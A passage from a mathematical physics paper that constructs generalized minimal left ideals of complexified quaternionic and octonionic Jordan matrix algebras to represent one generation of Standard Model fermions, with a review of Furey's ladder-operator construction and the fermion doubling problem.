\left\{\alpha^{\dagger},\alpha^{\dagger}\right\}& =0.\end{split} \tag{73}\] Note that \(Ii\) and \(Ij\) act as bases of \(\mathbb{C}l(2)\). ### Generalized minimal left ideals of \(\mathbb{C}\otimes J_{2}(\mathbb{H})\) To build up to projective lines of \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\), the physics of spinors for \(\mathbb{C}\otimes\mathbb{H}\) are uplifted to \(\mathbb{C}\otimes J_{2}(\mathbb{H})\). The \(\mathbb{C}\otimes\mathbb{H}\) spinors are also embedded into \(\mathbb{C}\otimes J_{2}(\mathbb{H})\) by placing \(\psi_{D}\) in the upper-right component and adding by its quaternionic Hermitian conjugate to obtain an element of \(\mathbb{C}\otimes J_{2}(\mathbb{H})\), \[\psi_{D}\to J\left(\psi_{D}\right)\equiv\left(\begin{array}{cc}0&\psi_{D}\\ 0&0\end{array}\right)+\left(\begin{array}{cc}0&\psi_{D}\\ 0&0\end{array}\right)^{\dagger}=\left(\begin{array}{cc}0&\psi_{D}\\ \hat{\psi}_{D}&0\end{array}\right). \tag{74}\] Note that here \(\dagger\) denotes matrix transpose and quaternionic conjugation. This brings in a complication for generalizing \(P\), as \(2\times 2\) matrices admit two projectors as idempotents, yet \(\mathbb{C}\otimes J_{2}(\mathbb{H})\) does not contain \(P=(1+Ik)/2\) on any diagonal elements. The action of \(\mathbb{C}\otimes\mathbb{H}\) must occur on the off-diagonals. Despite not giving projectors, the bases are embedded as follows \[P \to J_{P}\equiv J(P)=\left(\begin{array}{cc}0&P\\ \hat{P}&0\end{array}\right)=\frac{1}{2}\left(\begin{array}{cc}0&1+Ik\\ 1-Ik&0\end{array}\right),\] \[P^{*} \to J_{P^{*}}\equiv J\left(P^{*}\right)=\left(\begin{array}{cc}0 &P^{*}\\ P^{\dagger}&0\end{array}\right)=\frac{1}{2}\left(\begin{array}{cc}0&1-Ik\\ 1+Ik&0\end{array}\right),\] \[jP \to J_{jP}\equiv J(jP)=\left(\begin{array}{cc}0&jP\\ -jP&0\end{array}\right)=\frac{1}{2}\left(\begin{array}{cc}0&j+Ii\\ -j-Ii&0\end{array}\right), \tag{75}\] \[\hat{j}P^{*} \to J_{jP^{*}}\equiv J\left(jP^{*}\right)=\left(\begin{array}{ cc}0&\hat{j}P^{*}\\ jP^{*}&0\end{array}\right)=\frac{1}{2}\left(\begin{array}{cc}0&-j+Ii\\ j-Ii&0\end{array}\right).\] A new generalized multiplication was identified for spinors as elements of \(\mathbb{C}\otimes J_{2}(\mathbb{H})\) by taking the Jordan product with two matrices from the right to replace \(P\) and \(P^{*}\) in Eq. (68), \[m_{4}(a,v)=2\left[((A\circ v)\circ J_{P^{*}})\circ J_{P}-((A\circ v)\circ J_{ jP^{*}})\circ J_{jP}+((A\circ v)\circ J_{P})\circ J_{P^{*}}-((A\circ v)\circ J _{jP})\circ J_{j^{*}}\right]. \tag{76}\] where \(a\in\mathbb{C}\otimes J_{2}(\mathbb{H})\) and \(a\circ b=(ab+ba)/2\) is the Jordan product. We verified in Mathematica that \(m_{4}(a,v)\) gives spinorial ideals for arbitrary \(a\in\mathbb{C}\otimes J_{2}(\mathbb{H})\). Since \(\mathbb{C}\otimes J_{2}(\mathbb{H})\) is larger than the piece of \(\mathbb{C}\otimes\mathbb{H}\) embedded in \(\mathbb{C}\otimes J_{2}(\mathbb{H})\), the existence of such a generalized ideal may hold for the entire algebra constructed from the Dixon-Rosenfeld line via the Freudenthal-Tits construction. For Hermitian and anti-Hermitian vectors, the following generalized multiplication rule is found, \[m_{5}(a,v)=(a\circ v)\circ\hat{a}^{*}+a\circ(v\circ\hat{a}^{*})\,, \tag{77}\] where \(m_{5}\) is identified as a Jordan anti-associator. If \(a\) is chosen to be a purely off-diagonal element of \(\mathbb{C}\otimes J_{2}(\mathbb{H})\), then \(m_{5}\) leads to an element of \(\mathfrak{i}\) for \(v\) as a Hermitian or anti-Hermitian vector. If \(a\) is chosen as an arbitrary element of \(\mathbb{C}\otimes J_{2}(\mathbb{H})\), then the Hermitian vector uplifted to \(\mathbb{C}\otimes J_{2}(\mathbb{H})\) develops a purely real diagonal term, while the antiHermitian vector uplifted develops a purely imaginary diagonal term. It is also anticipated that diagonals of \(\mathbb{C}\otimes J_{2}(\mathbb{H})\) not found in \(\mathbb{C}\otimes\mathbb{H}\) should be purely bosonic, which motivates a higher-dimensional Hermitian and anti-Hermitian vector to be found as ideals of \(\mathbb{C}\otimes J_{2}(\mathbb{H})\). For scalars and two-forms, the following generalized multiplication rule is found with a Jordan anti-associator and slightly different conjugation, \[m_{6}(a,v)=(a\circ v)\circ\hat{a}+a\circ(v\circ\hat{a}). \tag{78}\] It turns out that the 2-form uplifted to \(\mathbb{C}\otimes J_{2}(\mathbb{H})\) is a minimal ideal, while the scalar uplifted must be generalized to include a complex diagonal. For concreteness, the left- and right-chiral spinors embedded in \(\mathbb{C}\otimes J_{2}(\mathbb{H})\) as minimal ideals of \(m_{4}\) in Eq. (76) are \[J_{\psi_{L}} =\left(\begin{array}{cc}0&(c_{1}+c_{3}j)\,P\\ c_{1}P^{*}-c_{3}P&0\end{array}\right) \tag{79}\] \[J_{\psi_{R}} =\left(\begin{array}{cc}0&(c_{2}-c_{4}j)\,P^{*}\\ c_{2}P+c_{4}P^{*}&0\end{array}\right).\] The vectors \(h\) and pseudo-vectors \(g\) embedded in \(\mathbb{C}\otimes J_{2}(\mathbb{H})\) to be used with Eq. (77) are generalized to the following minimal ideals with diagonal components \[J_{h} =\left(\begin{array}{cc}h_{4}&h_{0}I+h_{1}i+h_{2}j+h_{3}k\\ h_{0}I-h_{1}i-h_{2}j-h_{3}k&h_{5}\end{array}\right), \tag{80}\] \[J_{g} =\left(\begin{array}{cc}g_{4}I&g_{0}+g_{1}iI+g_{2}jI+g_{3}kI \\ g_{0}-g_{1}iI-g_{2}jI-g_{3}kI\end{array}\right).\] The scalars \(\phi\) and 2-forms \(F\) embedded in \(\mathbb{C}\otimes J_{2}(\mathbb{H})\) with Eq. (78) are found as minimal ideals when a complex diagonal is added to the scalars \[J_{\phi} =\left(\begin{array}{cc}\phi_{3}+\phi_{4}I&\phi_{1}+\phi_{2}I \\ \phi_{1}-\phi_{2}I&\phi_{5}+\phi_{6}I\end{array}\right), \tag{81}\] \[J_{F} =\left(\begin{array}{cc}0&F^{32}i+F^{13}j+F^{21}k+F^{01}iI+F^{ 02}jI+F^{03}kI\\ -F^{32}i-F^{13}j-F^{21}k-F^{01}iI-F^{02}jI-F^{03}kI&0\end{array}\right).\] One may anticipate that the vector, spinor, and conjugate spinor representations can be embedded in the three independent off-diagonal components of \(\mathbb{C}\otimes J_{3}(\mathbb{H})\), but this is left for future work. ## V Projective lines over \(\mathbb{C}\otimes\mathbb{O}\) via \(\mathbb{C}\otimes J_{2}(\mathbb{O})\) Minimal left ideals of \(\mathbb{C}l(6)\) via chain algebra \(\mathbb{C}\otimes\overleftarrow{\mathbb{O}}\) To establish our conventions for octonions, we review the complexification of the octonionic chain algebra applied to raising and lowering operators for \(SU(3)_{c}\times U(1)_{em}\) fermionic charge states [14, 15]. For \(\mathbb{C}\otimes\mathbb{O}\), we use \(I\) and \(e_{i}\) for \(i=1,\ldots,7\) as the imaginary units. To convert from Furey's octonionic basis to ours, take \(\{e_{1},e_{2},e_{3},e_{4},e_{5},e_{6},e_{7}\}\rightarrow\{e_{2},e_{3},e_{6},e _{1},e_{5},e_{7},-e_{4}\}\). A system of ladder operators was constructed from the complexification of the octonionic chain algebra \(\mathbb{C}\otimes\overleftarrow{\mathbb{O}}\cong\mathbb{C}l(6)\), which allows contact with \(SU(3)_{c}\times U(1)_{em}\)[14]. Due to the nonassociative nature of the octonions, the following association of multiplication is always assumed, where an arbitrary element \(f\in\mathbb{C}\otimes\mathbb{O}\) must be considered, \[\{\alpha_{i},\alpha_{j}\}:=\{\alpha_{i},\alpha_{j}\}\,f=\alpha_{i}\,(\alpha_{ j}f)+\alpha_{j}\,(\alpha_{i}f)\,. \tag{82}\] If \(a^{*}\) refers to complex conjugation and \(\tilde{a}\) refers to octonionic conjugation, denote \(a^{\dagger}=\tilde{a}^{*}\) as the Hermitian conjugate only when acting on \(a\in\mathbb{C}\otimes\mathbb{O}\). Our basis of raising and lowering operators is chosen as \[\alpha_{1}=q_{1} =\frac{1}{2}\left(-e_{5}+Ie_{1}\right), \alpha_{1}^{\dagger}=-q_{1}^{*} =\frac{1}{2}\left(e_{5}+Ie_{1}\right),\] \[\alpha_{2}=q_{2} =\frac{1}{2}\left(-e_{6}+Ie_{2}\right), \alpha_{2}^{\dagger}=-q_{2}^{*} =\frac{1}{2}\left(e_{6}+Ie_{2}\right), \tag{83}\] \[\alpha_{3}=q_{3} =\frac{1}{2}\left(-e_{7}+Ie_{3}\right), \alpha_{3}^{\dagger}=-q_{3}^{*} =\frac{1}{2}\left(e_{7}+Ie_{3}\right).\] With this basis, we explicitly confirmed in Mathematica that the following relations hold, \[\begin{split}\left\{\alpha_{i},\alpha_{j}^{\dagger}\right\}f& =\delta_{ij}f,\\ \left\{\alpha_{i},\alpha_{j}\right\}f&=0,\\ \left\{\alpha_{i}^{\dagger},\alpha_{j}^{\dagger}\right\}f& =0\end{split} \tag{84}\] It was also confirmed that \(\{\alpha_{i}^{*},\tilde{\alpha}_{j}\}=\delta_{ij}\). For later convenience, a leptonic sector of operators is also introduced as \[\alpha_{0}=Il^{*}=\frac{1}{2}\left(-e_{4}+I\right),\qquad\tilde{\alpha}_{0}= Il=\frac{1}{2}\left(e_{4}+I\right). \tag{85}\] Due to the non-associativity of octonions, acting from the left once does not span all of the possible transformations, which motivates nested multiplication. This naturally motivates \(\mathbb{C}\otimes\overleftarrow{\mathbb{C}}\) as the octonionic chain algebra corresponding to \(\mathbb{C}l(6)\). This chooses \(-e_{4}\) as a pseudoscalar, such that the \(k\)-vector decomposition of \(\mathbb{C}l(6)\) is spanned by \(1\)-vectors \(\{Ie_{2},Ie_{3},Ie_{6},Ie_{1},Ie_{5},Ie_{7}\}\). Next, a nilpotent object \(\omega=\alpha_{1}\alpha_{2}\alpha_{3}\) is introduced, where the parentheses of the chain algebra mentioned above is assumed below. The Hermitian conjugate is \(\omega^{\dagger}=\alpha_{3}^{\dagger}\alpha_{2}^{\dagger}\alpha_{1}^{\dagger}\). The state \(v_{c}=\omega\omega^{\dagger}\) is considered roughly as a vacuum state (perhaps renormalized with weak isospin up), since \(\alpha_{i}\omega\omega^{\dagger}=0\). Fermionic charge states of isospin up are identified as minimal left ideals via \[\begin{split} S^{u}\equiv&\qquad\qquad\qquad\nu \omega\omega^{\dagger}\\ +\bar{d}^{r}\alpha_{1}^{\dagger}\omega\omega^{\dagger}& +\bar{d}^{g}\alpha_{1}^{\dagger}\omega\omega^{\dagger}&+\bar{d}^{b} \alpha_{3}^{\dagger}\omega\omega^{\dagger}\\ +u^{r}\alpha_{3}^{\dagger}\alpha_{2}^{\dagger}\omega\omega^{ \dagger}&+u^{g}\alpha_{1}^{\dagger}\alpha_{3}^{\dagger}\omega \omega^{\dagger}&+u^{b}\alpha_{2}^{\dagger}\alpha_{1}^{\dagger} \omega\omega^{\dagger}\\ +\bar{e}\alpha_{3}^{\dagger}\alpha_{2}^{\dagger}\alpha_{1}^{ \dagger}\omega\omega^{\dagger}\end{split}\, \tag{86}\] where \(\nu,\bar{d}^{r},u^{i}\), and \(\bar{e}\) are complex coefficients. The weak isospin down states are found by building off of \(v_{c}^{*}=\omega^{\dagger}\omega\), giving \[\begin{split} S^{d}\equiv&\qquad\bar{\nu}\omega^{ \dagger}\omega\\ -d^{r}\alpha_{1}\omega^{\dagger}\omega&-d^{g}\alpha_{2} \omega^{\dagger}\omega&-d^{b}\alpha_{3}\omega^{\dagger}\omega\\ +\bar{u}^{r}\alpha_{3}\alpha_{2}\omega^{\dagger}\omega& +\bar{u}^{g}\alpha_{1}\alpha_{3}\omega^{\dagger}\omega& +\bar{u}^{b}\alpha_{2}\alpha_{1}\omega^{\dagger}\omega\\ +e\alpha_{1}\alpha_{2}\alpha_{3}\omega^{\dagger}\omega\end{split}. \tag{87}\] These algebraic operators represent charge states associated with one generation of the Standard Model with reference to \(SU(3)_{c}\times U(1)_{em}\). A notion of Pauli's exclusion principle is found, since the following relations hold, \[\begin{split}\omega\omega^{\dagger}\omega\omega^{\dagger}& =\omega\omega^{\dagger},\\ \alpha_{i}^{\dagger}\omega\omega^{\dagger}\omega\omega^{\dagger}& =\alpha_{i}^{\dagger}\omega\omega^{\dagger}\\ \alpha_{i}^{\dagger}\omega\omega^{\dagger}\alpha_{i}^{\dagger} \omega\omega^{\dagger}&=\alpha_{i}^{\dagger}\alpha_{j}^{ \dagger}\omega\omega^{\dagger}\alpha_{i}^{\dagger}\alpha_{j}^{\dagger}\omega \omega^{\dagger}=\alpha_{3}^{\dagger}\alpha_{2}^{\dagger}\alpha_{1}^{\dagger} \omega\omega^{\dagger}\alpha_{3}^{\dagger}\alpha_{2}^{\dagger}\alpha_{1}^{ \dagger}\omega\omega^{\dagger}=0.\end{split} \tag{88}\] The above equations imply that it is impossible to create two identical fermionic states. As implied, the three raising/lowering operators are associated with three color charges. Furey also demonstrated that the electric charge is associated with the mean of the number operators \(N_{i}=\alpha_{i}^{\dagger}\alpha_{i}\)[15]. To obtain spinors associated with these charge configurations, Furey advocates for \((\mathbb{C}\otimes\mathbb{H})\otimes_{\mathbb{C}}(\mathbb{C}\otimes\mathbb{O})= \mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\). Before reviewing this procedure, we first generalize the results of \(\mathbb{C}\otimes\mathbb{O}\) to \(\mathbb{C}\otimes J_{2}(\mathbb{O})\). ### Uplift of \(\mathbb{C}l(6)\) in \(\mathbb{C}\otimes\overleftarrow{J_{2}(\mathbb{O})}\) Next, the analogous raising and lowering operators associated with one generation of the Standard Model are constructed with elements of \(\mathbb{C}\otimes\overleftarrow{J_{2}(\mathbb{O})}\). Our guiding principle is to take elements of \(\mathbb{C}\otimes\mathbb{O}\), place them on the upper off-diagonal component of \(\mathbb{C}\otimes\overleftarrow{J_{2}(\mathbb{O})}\), and add the Hermitian octonionic conjugate. We seek a new generalized multiplication that implements the same particle dynamics as \(\mathbb{C}\otimes\overleftarrow{\mathbb{O}}\). For concreteness, consider \(J_{f}\) as an arbitrary element of \(\mathbb{C}\otimes J_{2}(\mathbb{O})\), \[J_{f}=\left(\begin{array}{cc}f_{8}&f\\ \tilde{f}&f_{9}\end{array}\right)=\left(\begin{array}{cc}f_{8}&f_{0}+\sum_{i= 1}^{7}e_{i}f_{i}\\ f_{0}-\sum_{i=1}^{7}e_{i}f_{i}&f_{9}\end{array}\right), \tag{89}\] where \(f_{i}=f_{i,0}+If_{i,1}\) for \(i=0,1,\ldots,9\). The Jordan product is utilized to restore elements of \(\mathbb{C}\otimes J_{2}(\mathbb{O})\). However, this conflicts with left multiplication utilized in the chain algebra \(\mathbb{C}\otimes\overleftarrow{\mathbb{C}}\). The natural multiplication for \(\mathbb{C}\otimes\overleftarrow{J_{2}(\mathbb{O})}\) used throughout uses a nested commutator of Jordan products, \[m_{7}\left(J_{1},J_{2},J_{f}\right)\equiv J_{1}\circ\left(J_{2}\circ J_{f} \right)-J_{2}\circ\left(J_{1}\circ J_{f}\right), \tag{90}\] where \(J_{1},J_{2}\in\mathbb{C}\otimes J_{2}(\mathbb{O})\) as arbitrary elements. Rather than having a single element of \(\mathbb{C}\otimes J_{2}(\mathbb{O})\) to implement \(\alpha_{i}\) and \(\alpha_{j}^{\dagger}\), the multiplication above is utilized. The following \(\mathbb{C}\otimes\mathbb{O}\) variables are first uplifted to elements of \(\mathbb{C}\otimes J_{2}(\mathbb{O})\), \[J_{\alpha_{0}} \equiv\left(\begin{array}{cc}0&\alpha_{0}\\ \tilde{\alpha}_{0}&0\end{array}\right)=\frac{1}{2}\left(\begin{array}{cc}0&- e_{4}+I\\ e_{4}+I&0\end{array}\right),\] \[J_{\alpha_{1}} \equiv\left(\begin{array}{cc}0&\alpha_{1}\\ \tilde{\alpha}_{1}&0\end{array}\right)=\frac{1}{2}\left(\begin{array}{cc}0&- e_{5}+e_{1}I\\ e_{5}-e_{1}I&0\end{array}\right),\] \[J_{\alpha_{2}} \equiv\left(\begin{array}{cc}0&\alpha_{2}\\ \tilde{\alpha}_{2}&0\end{array}\right)=\frac{1}{2}\left(\begin{array}{cc}0&- e_{6}+e_{2}I\\ e_{6}-e_{2}I&0\end{array}\right),\] \[J_{\alpha_{3}} \equiv\left(\begin{array}{cc}0&\alpha_{3}\\ \tilde{\alpha}_{3}&0\end{array}\right)=\frac{1}{2}\left(\begin{array}{cc}0&- e_{7}+e_{3}I\\ e_{7}-e_{3}I&0\end{array}\right),\] \[J_{\tilde{\alpha}_{0}} \equiv\left(\begin{array}{cc}0&\tilde{\alpha_{0}}\\ \alpha_{0}&0\end{array}\right)=\frac{1}{2}\left(\begin{array}{cc}0&e_{4}+I \\ -e_{4}+I&0\end{array}\right), \tag{91}\] \[J_{\alpha_{1}^{\dagger}} \equiv\left(\begin{array}{cc}0&\alpha_{1}^{\dagger}\\ \tilde{\alpha}_{1}^{\dagger}&0\end{array}\right)=\frac{1}{2}\left(\begin{array} []{cc}0&e_{5}+e_{1}I\\ -e_{5}-e_{1}I&0\end{array}\right),\] \[J_{\alpha_{2}^{\dagger}} \equiv\left(\begin{array}{cc}0&\alpha_{2}^{\dagger}\\ \tilde{\alpha}_{2}^{\dagger}&0\end{array}\right)=\frac{1}{2}\left(\begin{array} []{cc}0&e_{6}+e_{2}I\\ -e_{6}-e_{2}I&0\end{array}\right),\] \[J_{\alpha_{3}^{\dagger}} \equiv\left(\begin{array}{cc}0&\alpha_{3}^{\dagger}\\ \tilde{\alpha}_{3}^{\dagger}&0\end{array}\right)=\frac{1}{2}\left(\begin{array} []{cc}0&e_{7}+e_{3}I\\ -e_{7}-e_{3}I&0\end{array}\right),\] where \(\alpha_{0}=-e_{4}+I\) was introduced for later convenience. We also introduce \(J_{I\alpha_{i}}=IJ_{\alpha_{i}}\) as a shorthand. These matrices allow for the following nested multiplications to mimic the action of \(\alpha_{i}\) and \(\alpha_{j}^{\dagger}\), \[m_{\alpha_{1}}\left(J_{f}\right) =2\left(m_{7}\left(J_{I\tilde{\alpha}_{0}},J_{\alpha_{1}},J_{f} \right)+m_{7}\left(J_{I\alpha_{1}^{\dagger}},J_{\alpha_{3}^{\dagger}},J_{f} \right)\right),\] \[m_{\alpha_{2}}\left(J_{f}\right) =2\left(m_{7}\left(J_{I\tilde{\alpha}_{0}},J_{\alpha_{2}},J_{f} \right)+m_{7}\left(J_{I\alpha_{3}^{\dagger}},J_{\alpha_{1}^{\dagger}},J_{f} \right)\right),\] \[m_{\alpha_{3}}\left(J_{f}\right) =2\left(m_{7}\left(J_{I\tilde{\alpha}_{0}},J_{\alpha_{3}},J_{f} \right)+m_{7}\left(J_{I\alpha_{1}^{\dagger}},J_{\alpha_{2}^{\dagger}},J_{f} \right)\right),\] \[m_{\alpha_{1}^{\dagger}}\left(J_{f}\right) =2\left(m_{7}\left(J_{I\alpha_{0}},J_{\alpha_{1}^{\dagger}},J_{f} \right)+m_{7}\left(J_{I\alpha_{2}},J_{\alpha_{3}},J_{f}\right)\right), \tag{92}\] \[m_{\alpha_{2}^{\dagger}}\left(J_{f}\right) =2\left(m_{7}\left(J_{I\alpha_{0}},J_{\alpha_{2}^{\dagger}},J_{f} \right)+m_{7}\left(J_{I\alpha_{3}},J_{\alpha_{1}},J_{f}\right)\right),\] \[m_{\alpha_{3}^{\dagger}}\left(J_{f}\right) =2\left(m_{7}\left(J_{I\alpha_{0}},J_{\alpha_{3}^{\dagger}},J_{f} \right)+m_{7}\left(J_{I\alpha_{1}},J_{\alpha_{2}},J_{f}\right)\right).\] The following anticommutation relations were explicitly verified, \[\left\{m_{\alpha_{i}},m_{\alpha_{j}^{\dagger}}\right\}J_{f} \equiv m_{\alpha_{i}}\left(m_{\alpha_{j}^{\dagger}}\left(J_{f} \right)\right)+m_{\alpha_{j}^{\dagger}}\left(m_{\alpha_{i}}\left(J_{f} \right)\right)=\delta_{ij}J_{f}^{\rm off},\] \[\left\{m_{\alpha_{i}},m_{\alpha_{j}}\right\}J_{f} \equiv m_{\alpha_{i}}\left(m_{\alpha_{j}}\left(J_{f}\right)\right)+m_ {\alpha_{j}}\left(m_{\alpha_{i}}\left(J_{f}\right)\right)=0, \tag{93}\] \[\left\{m_{\alpha_{1}^{\dagger}},m_{\alpha_{j}^{\dagger}}\right\}J_{f} \equiv m_{\alpha_{i}^{\dagger}}\left(m_{\alpha_{j}^{\dagger}}\left(J_{f} \right)\right)+m_{\alpha_{i}^{\dagger}}\left(m_{\alpha_{i}^{\dagger}}\left(J_{f} \right)\right)=0,\] where \(J_{f}^{\rm off}\) contains only the off-diagonal components of \(J_{f}\). This suffices to generalize the fermionic degrees of freedom from \(\mathbb{C}\otimes\mathbb{O}\) since they are uplifted to the off-diagonals of \(\mathbb{C}\otimes J_{2}(\mathbb{O})\). As an abuse of notation, \(m_{\alpha_{i}}m_{\alpha_{j}}\) is shorthand for \(m_{\alpha_{i}}\left(m_{\alpha_{j}}\left(J_{f}\right)\right)\). The nilpotent operator of \(\mathbb{C}\otimes\overleftarrow{J_{2}(\mathbb{O})}\) is given by \(m_{\omega}\), \[m_{\omega}=m_{\alpha_{1}}m_{\alpha_{2}}m_{\alpha_{3}},\quad m_{\omega^{\dagger}} =m_{\alpha_{3}^{\dagger}}m_{\alpha_{2}^{\dagger}}m_{\alpha_{1}^{\dagger}} \tag{94}\] One may verify that \(m_{\omega}m_{\omega}=m_{\omega^{\dagger}}m_{\omega^{\dagger}}=0\), while \(m_{\omega}m_{\omega^{\dagger}}\) acts on \(J_{f}\) to give a generalized minimal ideal of \(\mathbb{C}\otimes\overleftarrow{J_{2}(\mathbb{O})}\), \[m_{\omega}m_{\omega^{\dagger}}J_{f}=\left(\begin{array}{cc}0&\omega\omega^{ \dagger}f\\ \left(\omega\omega^{\dagger}f\right)^{*\dagger}&0\end{array}\right)=\frac{1}{2 }\left(\begin{array}{cc}0&f_{0}\left(1-e_{4}I\right)+f_{4}\left(e_{4}+I \right)\\ f_{0}\left(1+e_{4}I\right)+f_{4}\left(-e_{4}+I\right)&0\end{array}\right), \tag{95}\] where \(f\) is the upper-right component of \(J_{f}\) and \(\left(\omega\omega^{\dagger}f\right)^{*\dagger}\) is a shorthand for the octonionic conjugate. This allows for the assignment of a neutrino "vacuum" state, which allows for the following assignments of particles, \[m_{\nu}=m_{\omega}m_{\omega^{\dagger}},\] \[m_{\bar{d}^{r}}=m_{\alpha_{1}^{\dagger}}m_{\omega}m_{\omega^{ \dagger}},\quad m_{\bar{d}^{g}}=m_{\alpha_{2}^{\dagger}}m_{\omega}m_{\omega^{ \dagger}},\quad m_{\bar{d}^{b}}=m_{\alpha_{3}^{\dagger}}m_{\omega}m_{\omega^{ \dagger}}\] \[m_{u^{r}}=m_{\alpha_{3}^{\dagger}}m_{\alpha_{2}^{\dagger}}m_{ \omega}m_{\omega^{\dagger}},\;\;m_{us}=m_{\alpha_{1}^{\dagger}}m_{\alpha_{3}^{ \dagger}}m_{\omega}m_{\omega^{\dagger}},\;\;m_{u^{b}}=m_{\alpha_{2}^{\dagger}} m_{\alpha_{1}^{\dagger}}m_{\omega}m_{\omega^{\dagger}}, \tag{96}\] \[m_{\bar{e}}=m_{\alpha_{3}^{\dagger}}m_{\alpha_{2}^{\dagger}}m_{ \alpha_{1}^{\dagger}}m_{\omega}m_{\omega^{\dagger}},\] and \[m_{\bar{\nu}}=m_{\omega^{\dagger}}m_{\omega},\] \[m_{d^{r}}=-m_{\alpha_{1}}m_{\omega^{\dagger}}m_{\omega},\;\;\;m_ {d^{g}}=-m_{\alpha_{2}}m_{\omega^{\dagger}}m_{\omega},\quad m_{d^{b}}=-m_{ \alpha_{3}}m_{\omega^{\dagger}}m_{\omega}\] \[m_{\bar{u}^{r}}=m_{\alpha_{3}}m_{\alpha_{2}}m_{\omega^{\dagger}}m _{\omega},\;\;m_{\bar{u}\bar{s}}=m_{\alpha_{1}}m_{\alpha_{3}}m_{\omega^{ \dagger}}m_{\omega},\;\;m_{\bar{u}\bar{b}}=m_{\alpha_{2}}m_{\alpha_{1}}m_{ \omega^{\dagger}}m_{\omega}, \tag{97}\] \[m_{e}=m_{\alpha_{3}}m_{\alpha_{2}}m_{\alpha_{1}}m_{\omega^{ \dagger}}m_{\omega}.\] In summary, the collection of weak-isospin up and down states are \[m^{u}\left(\nu,\bar{d}^{r},\bar{d}^{g},\bar{d}^{b},u^{r},u^{g},u^ {b},\bar{e}\right)=\nu m_{\nu}+\bar{d}^{r}m_{\bar{d}^{r}}+\bar{d}^{g}m_{\bar{d} ^{g}}+\bar{d}^{b}m_{\bar{d}^{b}}+u^{r}m_{u^{r}}+u^{g}m_{u^{g}}+u^{b}m_{u^{b}}+ \bar{e}m_{\tilde{e}},\] \[m^{d}\left(\bar{\nu},d^{r},d^{g},d^{b},\bar{u}^{r},\bar{u}^{g}, \bar{u}^{b},e\right)=\bar{\nu}m_{\bar{\nu}}+d^{r}m_{d^{r}}+d^{g}m_{d^{g}}+d^{b}m _{d^{b}}+\bar{u}^{r}m_{\bar{u}^{r}}+\bar{u}^{g}m_{\bar{u}^{g}}+\bar{u}^{b}m_{ \bar{u}^{b}}+em_{e}, \tag{98}\] where \(\nu,\bar{d}^{r}\), etc. are complex coefficients. ## VI Projective lines over \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) ### One generation from \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) Furey provided a formulation of the electroweak sector [14], which led to the Standard Model embedded in \(SU(5)\) and allows for \(U(1)_{B-L}\) symmetry [14, 15]. The construction relies on identifying \(\mathbb{C}l(10)=\mathbb{C}l(6)\otimes_{\mathbb{C}}\mathbb{C}l(4)\), which can be found from a double-sided chain algebra over \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\). For instance, the left- and right-chiral spinors can be brought together via \(\psi_{D}=\psi_{R}+\psi_{L}\) with the gamma matrices implemented as \[\gamma^{0}=1\left|Ii,\quad\gamma^{1}=Ii\right|j,\quad\gamma^{2}=Ij\left|j, \quad\gamma^{3}=Ik\right|j, \tag{99}\] where \(a|b\) acting on \(z\) is \(azb\), which is well-defined when \((az)b=a(zb)\). This allows for left and right action of \(\mathbb{C}\otimes\mathbb{H}\) to give \(\mathbb{C}l(4)=\mathbb{C}l(2)\otimes_{\mathbb{C}}\mathbb{C}l(2)\). This idea can be taken further to give \(\mathbb{C}l(10)\) to identify \(Spin(10)\) and make contact with \(SU(3)\times SU(2)\times U(1)\) for the Standard Model. In this manner, \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) allows for \(Spin(10)\) to act from the left. While the full \(\mathbb{C}l(4)\) spacetime algebra cannot be found, the remaining right action remarkably picks out \(SL(2,\mathbb{C})\) as \(SU(2)_{\mathbb{C}}\). A collection of left-chiral Weyl spinors in the \((\mathbf{2},\mathbf{1},\mathbf{16})\) representation of \(SL(2,\mathbb{C})\times Spin(10)\) also contains degrees of freedom for right-chiral antiparticles with opposite charges via \((\mathbf{1},\mathbf{2},\mathbf{16})\), which leads to a physicist's convention to ignore writing down the conjugate representation. Each of the \(16\) Weyl spinors is an element of \(\mathbb{C}^{2}\). When working with \(\mathbb{C}\otimes\mathbb{H}\otimes\overleftarrow{\mathbb{O}}\), there are no two-component vectors, so it is necessary to find two copies of \(\mathbf{16}\). When Furey explored \(\mathbb{C}l(10)\) from \(\mathbb{C}\otimes\mathbb{H}\otimes\overleftarrow{\mathbb{O}}\), a \(\mathbf{16}\) with its conjugate representation was found, instead of two \(\mathbf{16}\)'s to give \((\mathbf{2},\mathbf{1},\mathbf{16})\) for a single generation of Standard Model fermions. This led to the so-called fermion doubling problem. Recent work by Furey and Hughes introduced fermions in the non-associative \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) algebra to solve this fermion doubling problem, which can be resolved by taking a slightly different route to \(Spin(10)\), rather than taking bivectors of \(\mathbb{C}l(10)\)[11]. Instead, consider the following generalization of Pauli matrices, \[\sigma_{i}=-e_{i}j|1,\quad\sigma_{8}=-Ii|1,\quad\sigma_{9}=-Ik|1,\quad\sigma_{10 }=-I|1, \tag{100}\] where \(i=1,\ldots,7\) and \(\{\sigma_{i},\sigma_{8},\sigma_{9}\}\) allow for a basis of \(\mathbb{C}l(9)\). The ten "generators" \(\sigma_{I}\) for \(I=1,\ldots,10\) lead to transformations on \(f\) via \[\frac{1}{2}\sigma_{[I}\bar{\sigma}_{J]}\psi=\frac{1}{4}\left(\sigma_{I}\left( \bar{\sigma}_{J}f\right)-\sigma_{J}\left(\bar{\sigma}_{I}f\right)\right), \tag{101}\] where \(\bar{\sigma}_{a}=-\sigma_{a}\) for \(a=1,\ldots,9\) and \(\bar{\sigma}_{10}=\sigma_{10}\). This allows for \(Spin(10)\) to act on a Weyl spinor in the \(\mathbf{16}\) representation instead of two \(1\)-component objects of \(\mathbf{16}\oplus\overline{\mathbf{16}}\) to resolve the fermion doubling problem. With \(\alpha_{\mu}=(Il^{*},q_{1},q_{2},q_{3})\) and \(\alpha_{\mu}^{*}=(-Il,q_{1}^{*},q_{2}^{*},q_{3}^{*})\) for \(\mu=0,1,2,3\) as an electrostrong sector and \(\epsilon_{\alpha\beta}\) with \(\alpha=\uparrow,\downarrow\) as an electroweak sector, the non-associative algebra \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) can be used to implement particle states for a single generation of the Standard Model fermions. We specify the particle states by using the notation and assignments recently introduced by Furey and Hughes in their solution to the fermion doubling problem [11], namely 